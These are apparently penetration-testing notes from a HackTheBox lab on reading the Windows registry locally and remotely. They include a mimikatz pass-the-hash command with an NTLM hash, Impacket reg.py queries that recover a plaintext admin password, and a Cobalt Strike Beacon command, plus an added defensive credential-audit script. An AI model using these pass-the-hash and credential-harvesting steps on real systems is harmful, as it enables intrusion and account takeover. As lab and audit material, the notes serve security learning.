Querying the registry

Locally

PowerShell #1

Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel

PowerShell #2

We can run this locally, or use mimikatz (sekurlsa::pth /user:henry.vinson /domain:htb.local /dc:htb.local /ntlm:e53d87d42adaa3ca32bdb34a876cbffb /command:powershell) to spawn a PowerShell prompt in that user's context and then query the remote host's registry from it:

PS > $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('CurrentUser', 'htb.local')
PS > $key = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run')
PS > $reg.OpenSubKey('SOFTWARE').getSubkeyNames()
GiganticHostingManagementSystem
Microsoft
Policies
RegisteredApplications
VMware, Inc.
Wow6432Node
Classes
PS > $reg.OpenSubKey('SOFTWARE\GiganticHostingManagementSystem').getValueNames()
UserName
PassWord
PS > $reg.OpenSubKey('SOFTWARE\GiganticHostingManagementSystem').GetValue('UserName')
henry.vinson_adm
PS > $reg.OpenSubKey('SOFTWARE\GiganticHostingManagementSystem').GetValue('Password')
G1#Ny5@2dvht
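The session above finds a plaintext credential stored as a registry value. As an added example (not part of the original notes), the following PowerShell audits a registry subtree, locally or on a remote host via the same OpenRemoteBaseKey call, for value names that look like stored credentials and reports them with the value redacted; the function names, the name pattern and the default depth are my own choices.

```powershell
# Added example, not from the original notes: find registry values whose names look like
# stored credentials (as with UserName/PassWord under HKCU\SOFTWARE\GiganticHostingManagementSystem).
function Get-CredentialLikeRegistryValues {
    param(
        [Microsoft.Win32.RegistryKey]$Key,
        [string]$Pattern,
        [int]$Depth
    )
    foreach ($name in $Key.GetValueNames()) {
        if ($name -notmatch $Pattern) { continue }
        $raw = [string]$Key.GetValue($name)
        # Show only a two-character prefix so the audit output itself does not leak the secret.
        $preview = if ($raw.Length -gt 2) { $raw.Substring(0, 2) + ('*' * ($raw.Length - 2)) } else { '**' }
        [pscustomobject]@{
            Key     = $Key.Name
            Value   = $name
            Kind    = $Key.GetValueKind($name)   # e.g. String for the REG_SZ values seen above
            Preview = $preview
        }
    }
    if ($Depth -le 0) { return }
    foreach ($sub in $Key.GetSubKeyNames()) {
        try {
            $child = $Key.OpenSubKey($sub)
            if ($null -ne $child) {
                Get-CredentialLikeRegistryValues -Key $child -Pattern $Pattern -Depth ($Depth - 1)
                $child.Close()
            }
        } catch [System.Security.SecurityException] {
            # Keys the current account cannot read (common under HKLM) are skipped.
        }
    }
}

function Find-RegistryCredentials {
    param(
        [ValidateSet('CurrentUser', 'LocalMachine', 'Users')][string]$Hive = 'CurrentUser',
        [string]$SubKey = 'SOFTWARE',
        [string]$ComputerName = $env:COMPUTERNAME,   # a remote host needs the Remote Registry service running
        [int]$MaxDepth = 3
    )
    # Value names that usually indicate a credential stored in the registry (assumed pattern).
    $pattern = '(?i)pass(word|wd)?|pwd|secret|token|credential'
    $base = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey($Hive, $ComputerName)
    $root = $base.OpenSubKey($SubKey)
    if ($null -eq $root) { Write-Warning "Key $Hive\$SubKey not found on $ComputerName"; return }
    Get-CredentialLikeRegistryValues -Key $root -Pattern $pattern -Depth $MaxDepth
    $root.Close(); $base.Close()
}

# Usage: Find-RegistryCredentials -Hive CurrentUser | Format-Table -AutoSize
```

Run it against HKLM as well as HKCU on a host; any hit is an application that should be moved to DPAPI, the Credential Manager or a vault rather than a REG_SZ value.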

cmd

reg query HKLM\Software\Microsoft\ResKit /v Version

Remotely

Impacket’s reg.py

Note that in reg.py the current user hive is referred to as HKU, not HKCU.

oxdf@parrot$ reg.py -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb -dc-ip htb.local htb.local/[email protected] query -keyName HKU\\SOFTWARE
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\SOFTWARE
HKU\SOFTWARE\GiganticHostingManagementSystem
HKU\SOFTWARE\Microsoft
HKU\SOFTWARE\Policies
HKU\SOFTWARE\RegisteredApplications
HKU\SOFTWARE\VMware, Inc.
HKU\SOFTWARE\Wow6432Node
HKU\SOFTWARE\Classes

oxdf@parrot$ reg.py -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb -dc-ip htb.local htb.local/[email protected] query -keyName HKU\\SOFTWARE\\GiganticHostingManagementSystem
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\SOFTWARE\GiganticHostingManagementSystem
        UserName        REG_SZ   henry.vinson_adm
        PassWord        REG_SZ   G1#Ny5@2dvht

Cobalt Strike

Use Beacon's built-in 'reg' command (the architecture argument selects the 32- or 64-bit view of the registry):

reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion